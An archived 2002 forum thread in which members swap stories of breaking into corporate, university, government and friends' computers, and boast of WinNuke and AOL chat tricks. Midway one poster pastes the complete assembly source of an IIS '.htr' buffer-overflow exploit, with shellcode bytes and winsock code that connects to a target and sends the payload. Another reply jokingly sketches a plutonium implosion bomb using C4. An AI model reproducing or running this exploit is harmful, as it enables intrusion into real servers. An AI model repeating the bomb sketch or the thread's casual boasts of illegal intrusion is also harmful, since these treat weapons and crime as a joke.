Ikonboard » Printable Version of Topic

Forum: The Classroom
Topic: Pop quiz hotshot!
started by: Dark Knight Bob

Posted by Dark Knight Bob on Jan. 10 2002,18:57

i know a lot of people here know shit loads about computers obviously but have any of you ACTUALLY hx0r3d anything i.e illegally.

post as my freind bob or something if you think the feds are watching.

Posted by Non on Jan. 10 2002,19:09

Once this friend of mine hacked into this oil company and copied a garbage file and I was like hey man that's no garbage file that is a worm program and we had to go and hack in again and then the cops came but they went to the wrong phone booths and then i was arrested but they let me go.

Posted by Spydir on Jan. 10 2002,20:09

I've cracked my friend's comptuers as a joke, or just to prove they suck. I refuse to crack anything "big", unless they're hiring me to, but no one would do that cuz I'm no security expert...

It's funny though. I'll be in some class and do something "cool" with some computer, and then people start asking me "do you hack?" and I say "I have the general idea of how to, but I don't" then they say "I'll give you 20 bucks of you hack my girlfriend's hotmail account!". I take their 20 dollars and then just tell them the password's "password". it usually works, too. pretty fucking sad...

Posted by jim on Jan. 10 2002,20:31

I've done a few... Just for fun though.

Biggest one was radicausa.com Not the website, their network.

A friend of mine worked there and I was totally blitzed to find out they had no firewall. I told him how stupid that was, but he insisted that because everything was NT with no 98/95/ME boxes that it was secured.

I was able to gain full control of their Exchange box, 3 domain controllers, all of their TCPIP based printers in less that 15 minutes.

He told his boss about it, and to the best of my knowledge, they STILL don't have a firewall.

For those who don't know who Radica is, they are the company that makes those little hand held games like Deer Hunter, Bass Fishing, etc.....

Posted by kornalldaway on Jan. 10 2002,21:36

a few personal computers just to prove my point
nothing really major, tried some company servers before. got in web server local site as on. of course schools' network, but that was too easy

Posted by DeadAnztac on Jan. 10 2002,21:37

I went through a h4x0r phase before I hit the 7th grade. 6th grade year (when I was between 10 and 11) I had root on a few SMTP BSD boxen, a DNS server, and 2 or 3 boxes that I couldn't figure out at the time (I had accounts, but the boxes purpose eluded me then.) Looking back I believe they may have been directory servers. (In case you didn't know that's often where a large number of users and passwords are stored and located, often for the purpose of centralized SMTP, POP, NFS, Samba, etc.) I guess university security was rather weak, for as I told you, I was in 6th grade. I stopped that after I found out how stupid it was.

Posted by Wiley on Jan. 11 2002,01:05

I had my mad h4x0r phase as well. I even set up an online < Hacker Test > that's still there. The biggest crack I was involved in was into a .gov network best known for their work putting men on the moon (or did they??), some local Universities (UCI, USC), a biotech company (can't name this one), a few small ISPs and a big one (UUNet). I thought I was 1337 for a while and once Wired Magazine called me for a comment on an IIS bug (I was involved with some of that kinda stuff for a bit) but that all changed the day I got 0wn3d. Here's the story;
I met up with this hacker kid who was 17 at the time and talking a bunch of smack about all the government sites he rooted. He had a story that I wasn't buying about how the FBI woke him up at gunpoint and dragged his mom screaming out of the shower right in front of him one morning. I figured he had just seen Hackers one too many times. So I broke into his home computer and stole some of his source code for a piece of software he was writing as evidence of how I 0wn3d him. I also left a calling card sitting in his HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg key. This kinda pissed him off I guess, and the next week of my life was spent recovering/changing passwords and adding every new security measure I could throw at the network to no avail. I finally had to make the call "d00d ...I give up"!
I don't feel so bad now that this kid has a weekly call to the NSA, < testifies in front of Congress on possible computer threats >, gets mentioned in < Microsoft write ups > and is the guy who < named the Code Red worm >. He was also on the MTV Real Life Hacker special and was the only legit guy on the show. He's about the most 1337 guy walking the planet right now, and he taught me that just when you think you're the shit somebody can come along and flush your ass.

Posted by Rshias on Jan. 11 2002,03:54

Nope. Beyond knowing a good deal about computers, the hacking scene always eluded me. I honestly don't even know where to begin.

It is something I'd like to learn about simply for knowlege sake, but it might be hard to find a tutor. Any of you want to volunteer?

Posted by whiskey@throttle on Jan. 11 2002,04:33

I was BIG into it. I used to live on an underground vessel. It was kinda cool...the brigand chic, for any of your that know it well. I certainly learned a lot. The food sucked, though.

Now and then my friend's and I still broadcast our pirate signal and hack in to this mega-government mainframe. I'd tell you about it, but unfortunately, no one can be told...

You'd probably just have to see it for youself.

Posted by askheaves on Jan. 11 2002,06:24

That's a great story, Wiley

Anyway, I've never been much into hacking. Never even really tried that much. I may have inadvertantly exploited a little, but I don't remember. Frankly, I'm too straight-laced to even get into the scene. If I ever did, I'd be as white hat as it gets. I'm just not very l33t

Posted by Hex on Jan. 11 2002,06:49

Great story wiley.

I never really "owned" anyone since I consider that to be lame.

I prefer to help ppl who annoy me fuck up their boxes by themselves >

Rshias, I can help you there since I have too much time on my hands....

my ICQ number is 106292554

Posted by damien_s_lucifer on Jan. 11 2002,08:10

only hax0ring I ever did was in AOL's chat rooms. Waaay back when ('91) if you typed in the right commands you could do all kinds of freaky shit, like bomb the chat screen with 1000 lines of "FUCK YOU!" or post as someone else. It was all cool until one day I made the following mistake :

damien_s_lucifer: i want to get a 386
guide10578: I LIKE TO BLOW GOATS!!!! THEY TASTE GOOD

I had done this to at least a dozen other guides, and they never figured it out. This one knew the trick and closed my account

Posted by aolhell on Jan. 11 2002,17:24

heh..I remember that, dsl.

{S filename.wav -- play a sound on everyone's pc
{S a: -- access the floppy drive

there were others...

Posted by CatKnight on Jan. 11 2002,18:00

the furthest my hacking experience goes is winnuke

Posted by Jimi on Jan. 11 2002,19:53

What are you talking about? Winnuke 0wn5... I'm kidding please don't kill me

Posted by Nikita on Jan. 11 2002,19:58

oh yea winnuke ... to get rid of unwanted guests on the lab computers ... or just to annoy slacker labmate who's in the middle of typing a longass email

nuke ... NUKE ... NUUUUUUKE!

Posted by Spydir on Jan. 11 2002,20:02

edit: that's what i get for having more the one reply open.

if you want the basics of the security/hacking scene, just pick up a UNIX manual, read up on BugTraq, and keep reading. Surprisingly simple

Posted by Wiley on Jan. 11 2002,20:09

There are also a lot of good books on the subject. Maximum Security - A Hackers Guide to Protecting Your Computer and Network is a good one. Check your local library ..that's the big building with all the books.

Posted by Spydir on Jan. 11 2002,22:14

I generally stay away from books that say "hacker" in the title. After reading one, I think Stopping Hackers or something, I've learned that ignorance really is bliss, enspecially after seeing the goofy picture of the author smiling like a dumbshit

Posted by CatKnight on Jan. 11 2002,22:32

actually i just remembered i used to hack my wing commander privateer savegames to give my centurion level 5 shield and power generators. that required messing around with hexeditor and stuff. does that count?

Posted by Spydir on Jan. 11 2002,23:44

shockingly, in the true meaning of the word, yes it does.

Posted by DuSTman on Jan. 11 2002,23:59

I kinda think that maybe writing your own stuff is the best way to get security: If some dude finds a bug in apache or IIS then then can attack millions of web sites with it.

Write your own web server, and while it wont be as polished, it's unlikely people would try, because all they'd gain is the ability to attack your page and your page only..

Posted by Wiley on Jan. 12 2002,03:00

Quote (DuSTman @ Jan. 11 2002,23:59)

Write your own web server, and while it wont be as polished, it's unlikely people would try, because all they'd gain is the ability to attack your page and your page only..

Not entirly true. Ignorance of how your webserver works may not be bliss. Even your custom server software will have to follow some standards so that pages can be viewed. You still have to allow anonymous access to the files that make up your pages and you have to allow incoming traffic on tcp/ip port 80. And what type of security model will distinguish between guests and admins ..will you design your own as well? What about the OS running everything ...off the shelf or not? Will your browser report strange behavior back to you or take action on it's own to ban access from a dangerous client? What happens if I pass along something like this:
.386p
locals
jumps
.model flat, stdcall

extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC

.data

sploit_length equ 1157

sploit:
db "GET /"
db 041h, 041h, 041h, 041h, 041h, 041h, 041h
db 576 dup (041h)
db 041h, 041h, 041h, 041h, 041h, 041h, 0b0h, 087h, 067h, 068h, 0b0h, 087h
db 067h, 068h, 090h, 090h, 090h, 090h, 058h, 058h, 090h, 033h, 0c0h, 050h
db 05bh, 053h, 059h, 08bh, 0deh, 066h, 0b8h, 021h, 002h, 003h, 0d8h, 032h
db 0c0h, 0d7h, 02ch, 021h, 088h, 003h, 04bh, 03ch, 0deh, 075h, 0f4h, 043h
db 043h, 0bah, 0d0h, 010h, 067h, 068h, 052h, 051h, 053h, 0ffh, 012h, 08bh
db 0f0h, 08bh, 0f9h, 0fch, 059h, 0b1h, 006h, 090h, 05ah, 043h, 032h, 0c0h
db 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h, 052h, 051h
db 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h, 05ah, 0e2h, 0e6h, 043h
db 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h, 0f4h, 043h
db 052h, 053h, 0ffh, 012h, 08bh, 0f0h, 05ah, 033h, 0c9h, 050h, 058h, 0b1h
db 005h, 043h, 032h, 0c0h, 0d7h, 050h, 058h, 084h, 0c0h, 050h, 058h, 075h
db 0f4h, 043h, 052h, 051h, 053h, 056h, 0b2h, 054h, 0ffh, 012h, 0abh, 059h
db 05ah, 0e2h, 0e6h, 033h, 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h
db 0f4h, 089h, 047h, 0cch, 033h, 0c0h, 050h, 050h, 0b0h, 002h, 066h, 0abh
db 058h, 0b4h, 050h, 066h, 0abh, 058h, 0abh, 0abh, 0abh, 0b1h, 021h, 090h
db 066h, 083h, 0c3h, 016h, 08bh, 0f3h, 043h, 032h, 0c0h, 0d7h, 03ah, 0c8h
db 075h, 0f8h, 032h, 0c0h, 088h, 003h, 056h, 0ffh, 057h, 0ech, 090h, 066h
db 083h, 0efh, 010h, 092h, 08bh, 052h, 00ch, 08bh, 012h, 08bh, 012h, 092h
db 08bh, 0d7h, 089h, 042h, 004h, 052h, 06ah, 010h, 052h, 0ffh, 077h, 0cch
db 0ffh, 057h, 0f8h, 05ah, 066h, 083h, 0eeh, 008h, 056h, 043h, 08bh, 0f3h
db 0fch, 0ach, 084h, 0c0h, 075h, 0fbh, 041h, 04eh, 0c7h, 006h, 08dh, 08ah
db 08dh, 08ah, 081h, 036h, 080h, 080h, 080h, 080h, 033h, 0c0h, 050h, 050h
db 06ah, 048h, 053h, 0ffh, 077h, 0cch, 0ffh, 057h, 0f0h, 058h, 05bh, 08bh
db 0d0h, 066h, 0b8h, 0ffh, 00fh, 050h, 052h, 050h, 052h, 0ffh, 057h, 0e8h
db 08bh, 0f0h, 058h, 090h, 090h, 090h, 090h, 050h, 053h, 0ffh, 057h, 0d4h
db 08bh, 0e8h, 033h, 0c0h, 05ah, 052h, 050h, 052h, 056h, 0ffh, 077h, 0cch
db 0ffh, 057h, 0ech, 080h, 0fch, 0ffh, 074h, 00fh, 050h, 056h, 055h, 0ffh
db 057h, 0d8h, 080h, 0fch, 0ffh, 074h, 004h, 085h, 0c0h, 075h, 0dfh, 055h
db 0ffh, 057h, 0dch, 033h, 0c0h, 040h, 050h, 053h, 0ffh, 057h, 0e4h, 090h
db 090h, 090h, 090h, 0ffh, 06ch, 066h, 073h, 06fh, 066h, 06dh, 054h, 053h
db 021h, 080h, 08dh, 084h, 093h, 086h, 082h, 095h, 021h, 080h, 08dh, 098h
db 093h, 08ah, 095h, 086h, 021h, 080h, 08dh, 084h, 08dh, 090h, 094h, 086h
db 021h, 080h, 08dh, 090h, 091h, 086h, 08fh, 021h, 078h, 08ah, 08fh, 066h
db 099h, 086h, 084h, 021h, 068h, 08dh, 090h, 083h, 082h, 08dh, 062h, 08dh
db 08dh, 090h, 084h, 021h, 078h, 074h, 070h, 064h, 06ch, 054h, 053h, 021h
db 093h, 086h, 084h, 097h, 021h, 094h, 086h, 08fh, 085h, 021h, 094h, 090h
db 084h, 08ch, 086h, 095h, 021h, 084h, 090h, 08fh, 08fh, 086h, 084h, 095h
db 021h, 088h, 086h, 095h, 089h, 090h, 094h, 095h, 083h, 09ah, 08fh, 082h
db 08eh, 086h, 021h, 090h, 098h, 08fh, 04fh, 086h, 099h, 086h, 021h
_url2 db 85 dup (021h)
db ".htr HTTP/1.0"
db 00dh,00ah, 00dh, 00ah
13, 10, 0
logolen equ $-logo

u_length db 10,"No more than 70 chars in 2nd url.",13,10,0
u_lengthl equ $-u_length

errorinit db 10,"Error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit

nohost db 10,"No host or IP specified.", 13,10,0
nohostl equ $-nohost

noport db 10,"No port specified.",13,10,0
noportl equ $-noport

no_url db 10,"No URL specified.",13,10,0
no_urll equ $-no_url

urlinv db 10,"Invalid URL.. no file specified?",13,10,0
urlinvl equ $-urlinv

reshost db 10,"Error resolving host.",13,10,0
reshostl equ $-reshost

sockerr db 10,"Error creating socket.",13,10,0
sockerrl equ $-sockerr

ipill db 10,"IP error.",13,10,0
ipilll equ $-ipill

porterr db 10,"Invalid port.",13,10,0
porterrl equ $-porterr

cnerror db 10,"Error establishing connection.",13,10,0
cnerrorl equ $-cnerror

success db 10,"Data sent!",13,10,0
successl equ $-success

console_in dd ?
console_out dd ?
bytes_read dd ?

wsadescription_len equ 256
wsasys_status_len equ 128

WSAdata struct
wVersion dw ?
wHighVersion dw ?
szDescription db wsadescription_len+1 dup (?)
szSystemStatus db wsasys_status_len+1 dup (?)
iMaxSockets dw ?
iMaxUdpDg dw ?
lpVendorInfo dw ?
WSAdata ends

sockaddr_in struct
sin_family dw ?
sin_port dw ?
sin_addr dd ?
sin_zero db 8 dup (0)
sockaddr_in ends

wsadata WSAdata <?>
sin sockaddr_in <?>
sock dd ?
numbase dd 10
_port db 256 dup (?)
_host db 256 dup (?)
_url db 256 dup (?)
stuff db 042h, 068h, 066h, 075h, 041h, 050h

.code
start:

call init_console
push logolen
push offset logo
call write_console

call GetCommandLineA
mov edi, eax
mov ecx, -1
xor al, al
push edi
repnz scasb
not ecx
pop edi
mov al, 20h
repnz scasb
dec ecx
cmp ch, 0ffh
jz @@0
test ecx, ecx
jnz @@1
@@0:
push nohostl
push offset nohost
call write_console
jmp quit3
@@1:
mov esi, edi
lea edi, _host
call parse
or ecx, ecx
jnz @@2
push noportl
push offset noport
call write_console
jmp quit3
@@2:
lea edi, _port
call parse
or ecx, ecx
jnz @@3
push no_urll
push offset no_url
call write_console
jmp quit3

@@3:
push ecx
lea edi, _url
call parse
pop ecx
cmp ecx, 71
jb length_ok
push u_lengthl
push offset u_length
call write_console
jmp quit3

length_ok:

mov esi, offset _url
mov edi, offset _url2
@@10:
xor al, al
lodsb
cmp al, 02fh
jz whaq
test al, al
jz @@20
add al, 021h
stosb
jmp @@10
@@20:
push urlinvl
push offset urlinv
call write_console
jmp quit3

whaq:
push esi
lea esi, stuff
lodsw
stosw
lodsd
stosd
pop esi
fileget:
xor al, al
lodsb
test al, al
jz getdone
add al, 021h
stosb
jmp fileget
getdone:

push offset wsadata
push 0101h
call WSAStartup
or eax, eax
jz winsock_found

push errorinitl
push offset errorinit
call write_console
jmp quit3

winsock_found:
xor eax, eax
push eax
inc eax
push eax
inc eax
push eax
call socket
cmp eax, -1
jnz socket_ok

push sockerrl
push offset sockerr
call write_console
jmp quit2

socket_ok:
mov sock, eax
mov sin.sin_family, 2
mov esi, offset _port
lewp1:
xor al, al
lodsb
test al, al
jz go
cmp al, 039h
ja port_error
cmp al, 030h
jb port_error
jmp lewp1

port_error:
push porterrl
push offset porterr
call write_console
jmp quit1

go:

mov ebx, offset _port
call str2num
mov eax, edx
push eax
call htons
mov sin.sin_port, ax

mov esi, offset _host
lewp:
xor al, al
lodsb
cmp al, 039h
ja gethost
test al, al
jnz lewp
push offset _host
call inet_addr
cmp eax, -1
jnz ip_aight
push ipilll
push offset ipill
call write_console
jmp quit1

ip_aight:
mov sin.sin_addr, eax
jmp continue

gethost:
push offset _host
call gethostbyname
test eax, eax
jnz gothost

push reshostl
push offset reshost
call write_console
jmp quit1

gothost:
mov eax, [eax+0ch]
mov eax, [eax]
mov eax, [eax]
mov sin.sin_addr, eax

continue:
push size sin
push offset sin
push sock
call connect
or eax, eax
jz connect_ok
push cnerrorl
push offset cnerror
call write_console
jmp quit1

connect_ok:

xor eax, eax
push eax
push sploit_length
push offset sploit
push sock
call send
push successl
push offset success
call write_console

quit1:
push sock
call closesocket
quit2:
call WSACleanup
quit3:
push 0
call ExitProcess
parse proc

lewp9:
xor eax, eax
cld
lodsb
cmp al, 20h
jz done
test al, al
jz done2
stosb
dec ecx
jmp lewp9
done:
dec ecx
done2:
ret
endp

str2num proc
push eax ecx edi
xor eax, eax
xor ecx, ecx
xor edx, edx
xor edi, edi
lewp2:
xor al, al
xlat
test al, al
jz end_it
sub al, 030h
mov cl, al
mov eax, edx
mul numbase
add eax, ecx
mov edx, eax
inc ebx
inc edi
cmp edi, 0ah
jnz lewp2

end_it:
pop edi ecx eax
ret
endp

init_console proc
push -10
call GetStdHandle
or eax, eax
je init_error
mov [console_in], eax
push -11
call GetStdHandle
or eax, eax
je init_error
mov [console_out], eax
ret
init_error:
push 0
call ExitProcess
endp

write_console proc text_out:dword, text_len:dword
pusha
push 0
push offset bytes_read
push text_len
push text_out
push console_out
call WriteConsoleA
popa
ret
endp

end start

Now tell me can you deal with that?

Posted by Rshias on Jan. 12 2002,05:47

Quote

Okay, now I'm turned on.

Posted by editor on Jan. 14 2002,07:53

Mr Wiley;
I have some spare plutonium in the fridge; would you mind designing a detonator?

How about on your lunch?

Got 50 bucks in cash fer ya

Posted by Wiley on Jan. 14 2002,13:28

Quote (editor @ Jan. 13 2002,23:53)

Mr Wiley;
I have some spare plutonium in the fridge; would you mind designing a detonator?

How about on your lunch?

Got 50 bucks in cash fer ya

Sure, all you gotta do is get yourself some C4 and cut it into hexagon shaped patties. Then apply the patties around your plutonium casing (this should be round for it to work) in the same pattern as a soccer ball. Then wire a charge from a photostrobe powered by 12 D batteries to the C4. You can use the same sort of timer that you plug into the wall to turn your lights on at a certain time to trigger the photostrobe. Now, pay attention that the wire leaders are all the exact same length. It is important that all the C4 goes off at once or the plutonium won't get squeezed together in the initial blast.
Now keep in mind that none of this has been tested by myself, and most of it comes from movies ...but the theory sure looks sound so I think you're ready to rock.

Posted by Nikita on Jan. 14 2002,16:17

Quote (Wiley @ Jan. 11 2002,14:00)

Now tell me can you deal with that?

Easy, pop some extra strength tylenol and take a nap.

Posted by Hex on Jan. 14 2002,16:35

Quote (Rshias @ Jan. 11 2002,16:47)

Quote

<SNIP! way too long.>

Okay, now I'm turned on.

Was it really necessary to quote the whole thing?

Posted by Rshias on Jan. 14 2002,17:32

Sorry, thought I had chopped it down correctly before hitting submit. Guess it didn't work. It's fixed now.